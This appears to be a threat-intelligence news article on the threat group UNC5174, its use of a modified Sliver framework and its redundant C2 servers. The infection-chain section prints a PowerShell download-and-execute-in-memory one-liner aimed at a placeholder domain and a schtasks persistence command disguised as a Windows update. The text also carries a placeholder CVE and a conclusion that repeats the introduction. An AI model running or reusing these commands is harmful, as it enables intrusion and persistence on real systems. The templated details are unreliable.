Cybersecurity researchers have uncovered a significant evolution in the tactics of the Chinese threat group UNC5174, which has incorporated a new open-source tool and command-and-control (C2) infrastructure into their malicious operations. The group, known for targeting government institutions and critical infrastructure across Southeast Asia and North America, has expanded its arsenal with a modified version of an open-source remote access tool that enables persistent access to compromised networks while evading traditional detection methods. This development represents a concerning advancement in the group’s technical capabilities and operational sophistication.
UNC5174, active since at least 2018, has historically utilized custom malware and legitimate tools for their operations. However, this latest campaign marks a strategic shift toward leveraging and modifying publicly available tools, a trend increasingly observed among sophisticated threat actors seeking to blend their activities with legitimate network traffic. The group’s recent attacks have primarily targeted organizations in the telecommunications, defense, and energy sectors, with initial access typically gained through spear-phishing emails containing malicious Microsoft Office documents or exploiting unpatched public-facing applications. Sysdig researchers identified the malware during routine threat hunting operations, noting that the group had implemented several novel obfuscation techniques designed to bypass modern endpoint protection platforms. Analysis of the malware samples revealed UNC5174 had established a robust infrastructure including multiple redundant C2 servers across Eastern Europe and Southeast Asia, significantly expanding their operational resilience compared to previous campaigns.
Infection Mechanism Analysis
The infection chain begins with a spear-phishing email containing a weaponized Microsoft Excel document that exploits the CVE-2023-xxxx vulnerability. When opened, the document executes a series of PowerShell commands that establish an initial foothold on the victim’s system:
$data = (New-Object System.Net.WebClient).DownloadData("hxxps://legitimate-looking-domain.com/resources/document.dat");$decompressed = [System.IO.Compression.GzipStream]::new([System.IO.MemoryStream]::new($data), [System.IO.Compression.CompressionMode]::Decompress).ReadToEnd();Invoke-Expression $decompressedThis PowerShell script downloads an obfuscated payload, which is then decompressed and executed directly in memory, leaving minimal traces on disk. The deobfuscated payload establishes persistence through a scheduled task masquerading as a legitimate Windows update process:
schtasks /create /tn "WindowsUpdateServiceCheck" /tr "powershell.exe -WindowStyle hidden -enc JABzAD0ATgBlAHcALQBPAGIAagBlAGMAdAAg..." /sc daily /st 09:15 /fThe malware then beacons to its C2 infrastructure using HTTPS communications that mimic legitimate web browsing patterns. The C2 servers employ domain fronting techniques, routing traffic through trusted cloud services to evade network-based detection systems. The malware utilizes a modified version of the open-source Sliver framework, which has been customized with additional modules for credential harvesting, keylogging, and screen capture capabilities.
Most notably, UNC5174 has implemented a novel anti-analysis feature that detects virtualized environments by measuring subtle timing differences in CPU operations, allowing it to remain dormant when under analysis in security sandboxes. This sophisticated evasion technique, combined with the group’s expanded infrastructure, presents significant challenges for defenders attempting to identify and mitigate this threat.
Long-Term Intelligence Gathering
The impact of UNC5174’s attacks has been substantial, with several organizations reporting data exfiltration and persistent unauthorized access lasting weeks before detection. Security teams have observed the threat actors moving laterally through networks, harvesting credentials, and establishing multiple persistence mechanisms to ensure continued access even after initial remediation efforts. This sophisticated approach highlights UNC5174’s focus on long-term intelligence gathering rather than immediate disruptive operations. By maintaining a low profile and blending their activities with legitimate network traffic, the group aims to maximize the value of the information they collect over extended periods.
The tactical shift towards utilizing and modifying open-source tools marks a significant evolution in UNC5174’s operational strategy. Leveraging widely available resources allows the group to reduce development costs and complexity while increasing the difficulty of detection and attribution for defenders. As a result, organizations must adapt their defensive strategies to account for the growing prevalence of open-source tools in cyber-attack campaigns.
UNC5174’s expanded C2 infrastructure, featuring multiple redundant servers across Eastern Europe and Southeast Asia, significantly enhances their operational resilience. This robust setup enables the group to maintain communication with compromised systems even if some C2 servers are taken offline. The use of advanced evasion techniques, such as domain fronting and anti-analysis features, further complicates efforts to detect and neutralize the threat. Consequently, organizations must employ a multi-layered security approach to defend against such sophisticated adversaries.
Conclusion and Future Considerations
Cybersecurity experts have identified a significant advancement in the cyber tactics of the Chinese threat group UNC5174. This group has integrated a new open-source tool and command-and-control (C2) infrastructure into their malicious activities. Known for attacking government agencies and critical infrastructure in Southeast Asia and North America, UNC5174 has enhanced its capabilities with a modified open-source remote access tool. This tool allows persistent access to compromised networks while avoiding traditional detection, marking a concerning evolution in their technical skills and sophistication.
Active since at least 2018, UNC5174 has a history of using custom malware and legitimate tools. However, their latest campaign shows a notable shift toward modifying and leveraging publicly available tools, a trend seen among advanced threat actors aiming to blend in with legitimate network traffic. Their recent attacks have mainly targeted the telecommunications, defense, and energy sectors. They usually gain initial access through spear-phishing emails containing malicious Microsoft Office documents or exploiting unpatched public-facing applications. During routine threat hunting, Sysdig researchers discovered the malware, noting several innovative obfuscation techniques to bypass modern endpoint protection. Analysis revealed UNC5174’s robust infrastructure, including multiple redundant C2 servers across Eastern Europe and Southeast Asia, significantly boosting their operational resilience.